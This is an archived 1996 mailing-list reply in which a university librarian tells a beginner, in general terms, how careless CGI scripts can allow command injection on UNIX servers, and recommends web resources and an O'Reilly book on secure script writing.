FirstSearch script security
Steve Westman
swestman at sherlock.sherlock.utsa.edu
Wed Aug 14 12:21:38 EDT 1996
On Wed, 14 Aug 1996, Madeleine Showalter wrote:
> I have been told that "hackers" can enter commands in a form/search engine which can be
> transferred to your operating system. This can allow them to get to a command line
> prompt in your system. So, I assume that "secure" means to prevent this by changing
> your CGI script. That's all I know, I'm just a beginner in using CGI.
>
The answer is simple: Yes and No. If you are not careful in writing your
CGI scripting, you can leave yourself open to attacks, particularly if
you a) are using a UNIX platform for your server, and b) if you use
sendmail or other SUID types of programs that take user input.
That's the bad news. The "good" (if not "fail proof") news is that you
can avoid most security problems if you are aware of some of the problems
and you learn to avoid certain practices in your CGI scripting. There
are a number of books and sites out there on the Web, although good starting
places include:
http://www.yahoo.com/Computers_and_Internet/Internet/World_Wide_Web/Security
In particular, check out the "CGI" and "FAQ-World Wide Web Security" links.
If you are using perl for CGI programming on a UNIX platform, you might
also want to check out O'Reilly's "Managing Internet Information Services"
(ISBN 1-56592-062-7). It has good examples of secure script writing
(including a way to keep users from using those nasty characters when
filling out a form that uses the sendmail program to forward the
responses).
Hope this helps.
************************************************************************
* Stephen Westman (210) 691-5977 (phone) *
* Electronic Services Librarian (210) 691-4571 (FAX) *
* University of Texas at San Antonio swestman at coyote.utsa.edu *
* Library *
* 6900 North Loop 1604 West *
* San Antonio, Texas 78249 *
************************************************************************
More information about the Web4lib
mailing list